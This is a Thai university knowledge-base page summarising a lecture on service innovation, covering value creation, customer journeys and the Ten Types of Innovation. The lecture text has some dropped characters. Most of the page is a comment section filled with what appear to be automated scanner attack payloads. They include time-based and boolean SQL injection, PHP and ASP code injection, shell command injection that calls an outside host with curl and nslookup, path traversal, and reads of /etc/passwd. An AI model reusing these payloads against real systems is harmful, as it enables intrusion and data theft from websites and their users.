เว็บไซต์การจัดการความรู้ของ มสธ. ยินดีต้อนรับ | Log in | สมัครสมาชิก

ฐานความรู้ มสธ.

 

ถอดบทเรียนการเสริมสร้างความรู้ : เรื่อง นวัตกรรมบริการ (Service innovation)

การรวบรวมความรู้
ถอดบทเรียนการเสริมสร้างความรู้ : เรื่อง นวัตกรรมบริการ (Service innovation)
เมื่อวันที่ 1-2 สิงหาคม 2561 ณ ห้องประชุม 2604, 2605
...............................................................................
วิทยากร: ดร. มนู อรดีดลเชษฐ์นวัตกรรมบริการ (Service Innovation) คือ การคิดวิธีทางานใหม่ๆ บนพื้นฐานการใช้ เทคโนโลยีดิจิทัลที่นาไปสู่การสร้างคุณค่า (Value creation) ให้ลูกค้าหรือผู้รับบริการจะเห็นได้ว่านวัตกรรมบริการ ประกอบด้วย 3 ส่วนสาคัญ คือ 1) การคิดวิธีทางานใหม่ๆ 2) การใช้ เทคโนโลยีดิจิทัล และ 3) การสร้างคุณค่า ที่สาคัญต้องเน้นว่า ไม่ได้ทาเพื่อตนเอง ให้เน้นคุณค่าของหน่วยงาน คุณค่าจะวัดที่การใช้ประโยชน์จากการบริการที่ได้มาValue creation ในยุคดิจิทัลเป็นเรื่องทักษะที่เกี่ยวกับ Digital Service Innovation โดยมี 2 คาที่รวมกัน คือ Digital Service และ Innovation โดยเทคโนโลยีนั้นมีไว้เชื่อมโยงกันเป็น Community มีข้อมูลมากมายบน could ซึ่งเราสามารถนาข้อมูลเหล่านั้นมาคาดการณ์อนาคตได้ โดยการคาดการณ์นั้น คือ การเข้าใจความต้องการของลูกค้า ซึ่งพฤติกรรมผู้บริโภคยุคนี้เปลี่ยนไปมาก จาก Product centric ที่แข่งขันกันที่ตัวสินค้าและบริการ ไปเป็น Customer centric ซึ่งเป็นการแข่งขันแบบใหม่ แข่งกันด้วยสติปัญญา ทาอย่างไรเพื่อให้ได้มาตรการทาให้ลูกค้าได้รับคุณค่าสูงสุด ตัวอย่าง เช่น รถยนต์ 1 คัน Product- centric Intrinsic Value ซึ่งเป็นคุณสมบัติในระบบปกติ ของรถยนต์คันหนึ่ง คือ มีคุณค่าที่ออกแบบในสินค้า มีเจตนาสร้างให้สามารถนั่งได้ บรรทุกของได้ ขับเคลื่อนได้ Customer- centric Extrinsic Value คือ เป็นส่วนเสริมจากสินค้า และบริการ ได้แก่ ความสะดวก ประหยัด ทาให้รู้สึกดี เดินทางได้สบายใจ ปั้มน้ามันทั่วประเทศการคิดนวัตกรรม ไม่ใช่เรื่องง่าย เพราะต้องคิดวิธีการทางานใหม่ เพื่อตอบโจทย์ความต้องการของลูกค้า จึงต้องค้นหา Product centric Intrinsic Value และ Customer centric Extrinsic Value ของสินค้าหรือบริการของเราให้เจอก่อน แล้วจึงดาเนินการตามขั้นตอน1. Identify Market Segment and Customers ระบุส่วนของตลาดและลูกค้า เช่น ลูกค้าของคุณคือใคร ตัวอย่าง นักศึกษาที่ต้องการความช่วยเหลือด้านวิชาการจากอาจารย์2. Identify Customer’s Needs ระบุว่าลูกค้าต้องการอะไร เช่น นักศึกษาต้องการความช่วยเหลือและการชี้แนะด้านวิชาการจากอาจารย์3. Identify Customer’s Journey คือ การเดินทางไปหาคาตอบในการแก้ปัญหา ศึกษาขั้นตอนที่ลูกค้าใช้ในการแก้ปัญหา แล้วนามาวิเคราะห์ว่าจุดไหนมีปัญหา อุปสรรคอะไร เช่น อปุสรรคการเข้าพบอาจารย์เพื่อขอปรึกษาและแนะนา อาจารย์และนักศึกษามีเวลาว่างไม่ตรงกัน การคุยกันไม่รู้เรื่องเวลาน้อย มีวิธีใดที่จะแก้ปัญหาได้24. Identify Customer’s Pain-points and Gains ระบุสิ่งที่ลูกค้าไม่พอใจต่อการได้รับ จากการบริการ หรือ การทางานแบบเก่า และกาหนดจุดที่เราจะแก้ไขอันเนื่องมาจากความไม่พอใจของลูกค้า เช่น4.1 Pain Points คือ อุปสรรค ที่ต้องคิดต่อว่าจะแก้ไขอย่างไร นัดอาจารย์ยาก อาจารย์ไม่ค่อยว่าง ขาดคนที่คอยช่วยเหลือด้านวิชาการ ใช้เวลานานในการค้นคว้าหาความรู้ ขาดระบบที่ช่วยการเรียนรู้ได้อย่างง่ายและสะดวก4.2 Gains points คือ สิ่งที่ได้เพิ่ม ได้ประโยชน์จากระบบที่คิดแก้ไขอุปสรรค โอกาสได้ความรู้เพิ่มเติม โอกาสเรียนรู้ร่วมกับเพื่อนนักศึกษา และแลกเปลี่ยนความรู้ สร้างความเชื่อมั่นให้แก่ตัวเอง5. Design Value Proposition ระบุคุณค่าที่ลูกค้าจะได้รับ เช่น Value Proposition เราจะช่วยนักศึกษาได้รับบริการจากอาจารย์และเพื่อนร่วมเรียนได้อย่างสะดวก ได้รับการแนะนาการค้นคว้าจากแหล่งความรู้แบบง่าย ๆ และรวดเร็ว6. Solution design and digital service design คือ การคิดวิธีการทางานใหม่ ที่แตกต่างจากกระบวนงานเดิม ซึ่งอาจจะเป็นวิธีปฏิบัติ แนวปฏิบัติ เพื่อแก้ปัญหาที่เกิดในการให้บริการ เช่น การใช้ Social media ในการติดต่อสื่อสารกับอาจารย์แบบ Asynchronous เพื่อแก้ปัญหาอาจารย์ไม่ว่างTen Types of Innovation1. Profit Model: วิธีหารายได้ แปลงข้อเสนอให้เป็นมูลค่า ที่มีผลต่อการหารายได้2. Network: เซื่อมโยงผู้ที่เกี่ยวข้องเพื่อร่วมกันสร้างคุณค่า3. Structure: Organize and align talents and assets ทรัพยากรในโครงสร้างมีการจัดสรรอย่างไร มีการบริหารจัดการอย่างไร4. Process: กาหนดวิธีการทางานอย่างมีประสิทธิภาพ เป็นการทางานภายในเพื่อสนับสนุนข้อเสนอ (offering) มีนวัตกรรมในวิธีการทางานโดยพึ่ง ดิจิตอล เน้นที่ลูกค้า5. Product Performance: พัฒนา Functions/Features ที่โดดเด่น เป็นข้อเสนอที่มีคุณค่าและคุณภาพ เป็นการปรับภายใน มีวิธีการทางานใหม่ ในสิ่งที่ลูกค้าไม่พอใจ ตอบโจทย์ลูกค้าได้6. Product System: สร้างสินค้าและบริการที่เกื้อหนุนกัน อะไรเป็นสินค้าบริการ สินค้าหลักที่ต้องการ37. Service: สนับสนุนการสร้างคุณค่าและขยายผลในทุกด้าน การมีโลก 2 ใบ คือ โลกไซเบอร์ และโลกปัจจุบัน สินค้าทาให้เกิดบริการ8. Channel: เชื่อมโยงและส่งมอบข้อเสนอให้ลูกค้าและผู้ใช้บริการ เป็นช่องทางที่ลูกค้าเข้าถึง ทาให้สนใจซื้อเพิ่มขึ้น ต้องคิดนอกกรอบ จะทาให้เกิดรายได้9. Brand: มาตราการทาให้ลูกค้าและตลาดได้รับรู้ข้อเสนอและธุรกิจ ทาให้เขาสนใจข้อเสนอของเรามากกว่าคู่แข่ง โดยสื่อจุดเด่น เอกลักษณ์ของเรา10. Customer Engagement: เข้าใจความต้องการของลูกค้า และอาศัยการปฏิสัมพันธ์และการสร้างความสัมพันธ์ เพื่อให้ลูกค้ามีส่วนร่วมในการสร้างคุณค่า เป็นการสร้างเวทีให้ลูกค้ามาใช้บริการวิธีใช้ Ten Types of Innovation เพื่อการออกแบบ Digital Service Systemนวัตกรรมของ Larry Keeley ทั้งสามกลุ่มถูกนามาใช้เป็นฐานการสร้างนวัตกรรมบริการ ขึ้นอยู่กับเป้าประสงค์ของผู้ออกแบบระบบ ดังนี้1. กลุ่มนวัตกรรม Configuration สนับสนุนการสร้างนวัตกรรมในเชิงกระบวนการ หมายถึง เน้นการออกแบบ Process เพื่อทางานที่ปรับเปลี่ยนจากเดิม เน้นที่คุณค่าผู้ใช้บริการเป็นหลัก2. กลุ่มนวัตกรรม Offerings สนับสนุนการปรับเปลี่ยนด้วยการเพิ่ม Extrinsic value ให้มากๆ เพื่อสร้างคุณค่าให้ผู้ใช้บริการ3. กลุ่มนวัตกรรม Experience สนับสนุนการปรับเปลี่ยน การให้บริการเพื่อเน้นให้เกิด Customerexperience เป็นหลัก47. Value Constellationกลุ่มดาวแห่งคุณค่า เป็นพิมพ์เขียวการทางานเป็นสเป็คของระบบ นาข้อขอมูลทั้งหมดมาสร้าง Map กลยุทธ์เชิงนวัตกรรม ตัวอย่าง แนวคิดการออกแบบระบบบริการปรึกษาวิชาการให้นักศึกษา ด้วยการ Map จากกลุ่มกลยุทธ์เชิงนวัตกรรม

Share |                             แสดงความเห็น โปรด Log in
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
-1" OR 3*2<(0+5+835-835) --
12/8/2023
555
fdfrSNjL
12/8/2023
555
-1 OR 3+280-280-1=0+0+0+1
12/8/2023
555
-1" OR 3+835-835-1=0+0+0+1 --
12/8/2023
555
-1" OR 2+835-835-1=0+0+0+1 --
12/8/2023
555
-1' OR 3*2>(0+5+523-523) or 'YKNuWzs0'='
12/8/2023
555
-1' OR 3*2<(0+5+523-523) or 'YKNuWzs0'='
12/8/2023
555
-1' OR 3+523-523-1=0+0+0+1 or 'YKNuWzs0'='
12/8/2023
555
-1' OR 2+523-523-1=0+0+0+1 or 'YKNuWzs0'='
12/8/2023
555
-1' OR 3*2>(0+5+896-896) --
12/8/2023
555
-1' OR 3*2<(0+5+896-896) --
12/8/2023
555
-1' OR 3+896-896-1=0+0+0+1 --
12/8/2023
555
-1' OR 2+896-896-1=0+0+0+1 --
12/8/2023
555
fdfrSNjL
12/8/2023
555
-1 OR 3*2<(0+5+280-280)
12/8/2023
555
fdfrSNjL
12/8/2023
555
-1 OR 2+280-280-1=0+0+0+1
12/8/2023
555
-1 OR 3*2>(0+5+228-228) --
12/8/2023
555
-1 OR 3*2<(0+5+228-228) --
12/8/2023
555
-1 OR 3+228-228-1=0+0+0+1 --
12/8/2023
555
-1 OR 2+228-228-1=0+0+0+1 --
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
-1 OR 3*2>(0+5+280-280)
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
@@CU7T6
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
-1 OR 3*2>(0+5+786-786) --
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
-1' OR 3*2<(0+5+910-910) or 'M4inmmyy'='
fdfrSNjL
12/8/2023
-1' OR 3+910-910-1=0+0+0+1 or 'M4inmmyy'='
fdfrSNjL
12/8/2023
-1' OR 2+910-910-1=0+0+0+1 or 'M4inmmyy'='
fdfrSNjL
12/8/2023
-1' OR 3*2>(0+5+889-889) --
fdfrSNjL
12/8/2023
-1' OR 3*2<(0+5+889-889) --
fdfrSNjL
12/8/2023
-1' OR 3+889-889-1=0+0+0+1 --
fdfrSNjL
12/8/2023
-1' OR 2+889-889-1=0+0+0+1 --
fdfrSNjL
12/8/2023
-1 OR 3*2>(0+5+846-846)
fdfrSNjL
12/8/2023
-1 OR 3*2<(0+5+846-846)
fdfrSNjL
12/8/2023
-1" OR 2+483-483-1=0+0+0+1 --
fdfrSNjL
12/8/2023
-1 OR 2+846-846-1=0+0+0+1
fdfrSNjL
12/8/2023
-1" OR 3+483-483-1=0+0+0+1 --
fdfrSNjL
12/8/2023
-1 OR 3*2<(0+5+786-786) --
fdfrSNjL
12/8/2023
-1 OR 3+786-786-1=0+0+0+1 --
fdfrSNjL
12/8/2023
-1 OR 2+786-786-1=0+0+0+1 --
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
-1 OR 3+846-846-1=0+0+0+1
fdfrSNjL
12/8/2023
b9WVQBV3' OR 825=(SELECT 825 FROM PG_SLEEP(15))--
fdfrSNjL
12/8/2023
1
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
-1" OR 3*2>(0+5+835-835) --
12/8/2023
1'"
fdfrSNjL
12/8/2023
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
fdfrSNjL
12/8/2023
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
fdfrSNjL
12/8/2023
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
fdfrSNjL
12/8/2023
if(now()=sysdate(),sleep(15),0)
fdfrSNjL
12/8/2023
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
fdfrSNjL
12/8/2023
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
fdfrSNjL
12/8/2023
-1' OR 3*2>(0+5+910-910) or 'M4inmmyy'='
fdfrSNjL
12/8/2023
gd7QUq5k') OR 433=(SELECT 433 FROM PG_SLEEP(15))--
fdfrSNjL
12/8/2023
-1)); waitfor delay '0:0:15' --
fdfrSNjL
12/8/2023
-1)) OR 786=(SELECT 786 FROM PG_SLEEP(15))--
fdfrSNjL
12/8/2023
-5) OR 920=(SELECT 920 FROM PG_SLEEP(15))--
fdfrSNjL
12/8/2023
-5 OR 116=(SELECT 116 FROM PG_SLEEP(15))--
fdfrSNjL
12/8/2023
y4JUOjuU')); waitfor delay '0:0:25.956' --
fdfrSNjL
12/8/2023
A5PQeT0z')); waitfor delay '0:0:15' --
fdfrSNjL
12/8/2023
yCzJaWJj'); waitfor delay '0:0:15' --
fdfrSNjL
12/8/2023
1 waitfor delay '0:0:15' --
fdfrSNjL
12/8/2023
-1); waitfor delay '0:0:15' --
fdfrSNjL
12/8/2023
-1; waitfor delay '0:0:15' --
fdfrSNjL
12/8/2023
-1" OR 3*2>(0+5+483-483) --
fdfrSNjL
12/8/2023
-1" OR 3*2<(0+5+483-483) --
fdfrSNjL
12/8/2023
s9OE2xVQ')) OR 425=(SELECT 425 FROM PG_SLEEP(15))--
fdfrSNjL
12/8/2023
555
1 waitfor delay '0:0:15' --
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
@@hFntv
12/8/2023
555
1
12/8/2023
555
fdfrSNjL
12/8/2023
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
12/8/2023
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
12/8/2023
555
if(now()=sysdate(),sleep(15),0)
12/8/2023
555
fdfrSNjL'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
12/8/2023
555
N4utAqR5')) OR 71=(SELECT 71 FROM PG_SLEEP(15))--
12/8/2023
555
zOto7mYc') OR 254=(SELECT 254 FROM PG_SLEEP(15))--
12/8/2023
555
3sSJqrud' OR 177=(SELECT 177 FROM PG_SLEEP(26.844))--
12/8/2023
555
FE9ORpIP' OR 813=(SELECT 813 FROM PG_SLEEP(15))--
12/8/2023
555
Cqno8Rn8')); waitfor delay '0:0:15' --
12/8/2023
555
fdfrSNjL
12/8/2023
FfbBHCgv'; waitfor delay '0:0:15' --
fdfrSNjL
12/8/2023
555
HTl114Uv'); waitfor delay '0:0:15' --
12/8/2023
555
znDY4nVG'; waitfor delay '0:0:15' --
12/8/2023
555
1'"
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
fdfrSNjL
12/8/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
'+response.write(9106797*9964917)+'
iENUXxqp
8/26/2023
555
./iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
xfs.bxss.me
8/26/2023
555
';print(md5(31337));$a='
8/26/2023
read_kb.asp/.
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
(nslookup -q=cname hitdnuimvlosg4fd45.bxss.me||curl hitdnuimvlosg4fd45.bxss.me))
8/26/2023
response.write(9106797*9964917)
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
${@print(md5(31337))}
8/26/2023
555
$(nslookup -q=cname hitdbitnhuevt013d5.bxss.me||curl hitdbitnhuevt013d5.bxss.me)
8/26/2023
555
iENUXxqp
8/26/2023
555
http://xfs.bxss.me?ac.th
8/26/2023
555
";print(md5(31337));$a="
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
955609
8/26/2023
"+response.write(9106797*9964917)+"
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
echo sgbwdz$()\ evnmva\nz^xyu||a #' &echo sgbwdz$()\ evnmva\nz^xyu||a #|" &echo sgbwdz$()\ evnmva\nz^xyu||a #
8/26/2023
555
file:///etc/passwd
8/26/2023
555
&echo rocrpf$()\ tcogao\nz^xyu||a #' &echo rocrpf$()\ tcogao\nz^xyu||a #|" &echo rocrpf$()\ tcogao\nz^xyu||a #
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
../../../../../../../../../../../../../../windows/win.ini
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
".gethostbyname(lc("hitmi"."ifkxxdpj21b5d.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(65).chr(110).chr(82)."
8/26/2023
555
iENUXxqp bcc:009247.284-68853.284.ea9c5.19594.2@bxss.me
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
iENUXxqp
8/26/2023
555
../iENUXxqp
8/26/2023
555
iENUXxqp
8/26/2023
555